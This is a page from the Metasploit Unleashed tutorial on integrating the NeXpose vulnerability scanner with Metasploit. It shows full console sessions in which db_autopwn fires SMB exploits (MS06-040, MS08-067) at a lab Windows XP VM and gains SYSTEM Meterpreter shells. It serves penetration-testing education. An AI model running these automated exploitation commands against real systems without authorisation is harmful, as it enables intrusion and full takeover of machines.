Working With NeXpose
From Metasploit Unleashed
With the acquisition of Metasploit by Rapid7, there is now excellent compatibility between Metasploit and the NeXpose vulnerability scanner. Rapid7 has a community edition of their scanner that is available at http://www.rapid7.com/vulnerability-scanner.jsp. After we have installed and updated NeXpose, we run a full credentialed scan against our vulnerable WinXP VM.
We create a new report in NeXpose and save the scan results in 'NeXpose Simple XML' format that we can later import into Metasploit. Next, we fire up Metasploit, create a new database, and use the 'db_import' command to auto-detect and import our scan results file.
msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db msf > db_import /root/report.xml [*] Importing 'NeXpose Simple XML' data [*] Importing host 192.168.1.161 [*] Successfully imported /root/report.xml
Now, running the 'db_services' and 'db_vulns' command will display the all-important vulnerability information that Metasploit now has at its disposal.
msf > db_services Services ======== created_at info name port proto state updated_at Host Workspace ---------- ---- ---- ---- ----- ----- ---------- ---- --------- 2010-08-22 18:12:03 UTC ntp 123 udp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:05 UTC dce endpoint resolution 135 tcp open 2010-08-22 18:12:05 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC cifs name service 137 udp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC Windows 2000 LAN Manager cifs 139 tcp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:06 UTC snmp 161 udp open 2010-08-22 18:12:06 UTC 192.168.1.161 default 2010-08-22 18:12:05 UTC Windows 2000 LAN Manager cifs 445 tcp open 2010-08-22 18:12:05 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC microsoft remote display protocol 3389 tcp open 2010-08-22 18:12:03 UTC 192.168.1.161 default msf > db_vulns [*] Time: 2010-08-22 18:12:00 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos [*] Time: 2010-08-22 18:12:01 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035 [*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001 [*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp [*] Time: 2010-08-22 18:12:05 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001 [*] Time: 2010-08-22 18:12:08 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001 [*] Time: 2010-08-22 18:12:09 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
We could certainly use this information to surgically attack specific vulnerabilities but since we are in our own lab environment and are not concerned about being stealthy, we will let 'db_autopwn' take full advantage of the situation.
msf > db_autopwn -h [*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -q Disable exploit module output -R [rank] Only run modules with a minimal rank -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex -T [secs] Maximum runtime for any exploit in seconds
We will tell db_autopwn to attack all targets using the vulnerabilities that are gathered in the database and watch the magic.
msf > db_autopwn -x -e [*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] Meterpreter session 1 opened (192.168.1.101:42662 -> 192.168.1.161:4265) at 2010-08-22 12:14:06 -0600 [*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution... [*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution... msf >
Just like that, we have a Meterpreter session opened for us!
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE 192.168.1.101:42662 -> 192.168.1.161:4265 msf > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter >
NeXpose from msfconsole
The Metasploit/NeXpose integration is not limited to simply importing scan results files. You can run NeXpose scans directly from msfconsole by first making use of the 'nexpose' plugin.
msf > load nexpose ____ _ _ _____ _ _ __ __ | _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___ | |_) / _` | '_ \| |/ _` | / / | \| |/ _ \\ /| '_ \ / _ \/ __|/ _ \ | _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/ |_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___| |_| |_| [*] NeXpose integration has been activated [*] Successfully loaded plugin: nexpose msf > help NeXpose Commands ================ Command Description ------- ----------- nexpose_activity Display any active scan jobs on the NeXpose instance nexpose_connect Connect to a running NeXpose instance ( user:pass@host[:port] ) nexpose_disconnect Disconnect from an active NeXpose instance nexpose_discover Launch a scan but only perform host and minimal service discovery nexpose_dos Launch a scan that includes checks that can crash services and devices (caution) nexpose_exhaustive Launch a scan covering all TCP ports and all authorized safe checks nexpose_scan Launch a NeXpose scan against a specific IP range and import the results
Before running a scan against a target, we first need to connect to our server running NeXpose by using the 'nexpose_connect' command along with the credentials for the NeXpose instance. Note that you will have to append 'ok' to the end of the connect string to acknowledge that the SSL connections are not verified.
msf > nexpose_connect dookie:s3cr3t@192.168.1.152 [-] Warning: SSL connections are not verified in this release, it is possible for an attacker [-] with the ability to man-in-the-middle the NeXpose traffic to capture the NeXpose [-] credentials. If you are running this on a trusted network, please pass in 'ok' [-] as an additional parameter to this command. msf > nexpose_connect dookie:s3cr3t@192.168.1.152 ok [*] Connecting to NeXpose instance at 192.168.1.152:3780 with username dookie... msf >
Now that we are connected to our server, we can run a vulnerability scan right from within Metasploit.
msf > nexpose_discover -h Usage: nexpose_scan [options] OPTIONS: -E Exclude hosts in the specified range from the scan -I Only scan systems with an address within the specified range -P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs) -R Specify a minimum exploit rank to use for automated exploitation -X Automatically launch all exploits by matching reference and port after the scan completes (unsafe) -c Specify credentials to use against these targets (format is type:user:pass[@host[:port]] -d Scan hosts based on the contents of the existing database -h This help menu -n The maximum number of IPs to scan at a time (default is 32) -s The directory to store the raw XML files from the NeXpose instance (optional) -t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit) -v Display diagnostic information about the scanning process -x Automatically launch all exploits by matching reference after the scan completes (unsafe) msf > nexpose_discover 192.168.1.161 [*] Scanning 1 addresses with template aggressive-discovery in sets of 32 [*] Completed the scan of 1 addresses msf >
Again, we run 'db_services' and 'db_vulns' and we can see that the results are of the same quality as those we imported via the XML file.
msf > db_services Services ======== created_at info name port proto state updated_at Host Workspace ---------- ---- ---- ---- ----- ----- ---------- ---- --------- 2010-08-22 18:24:28 UTC ntp 123 udp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC dce endpoint resolution 135 tcp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC cifs name service 137 udp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC Windows 2000 LAN Manager cifs 139 tcp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC snmp 161 udp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC Windows 2000 LAN Manager cifs 445 tcp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC microsoft remote display protocol 3389 tcp open 2010-08-22 18:24:28 UTC 192.168.1.161 default msf > db_vulns [*] Time: 2010-08-22 18:24:25 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos [*] Time: 2010-08-22 18:24:26 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035 [*] Time: 2010-08-22 18:24:27 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001 [*] Time: 2010-08-22 18:24:28 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp [*] Time: 2010-08-22 18:24:30 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001 [*] Time: 2010-08-22 18:24:33 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001 [*] Time: 2010-08-22 18:24:35 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
Because it is so much fun, we will let db_autopwn take over again.
msf > db_autopwn -x -e [*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution... [*] Meterpreter session 2 opened (192.168.1.101:51373 -> 192.168.1.161:35156) at 2010-08-22 12:26:49 -0600 [*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution... msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE 192.168.1.101:51373 -> 192.168.1.161:35156 msf > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > exit [*] Meterpreter session 2 closed. Reason: User exit msf >
As we can see, this integration, while still in its early stages, is very beneficial and adds incredible power to Metasploit.
Vulnerability Scanning > Working With NeXpose
SMB Login Check | VNC Authentication | Open X11 | WMAP Web Scanner | Working With NeXpose | Working With Nessus | Using The Database
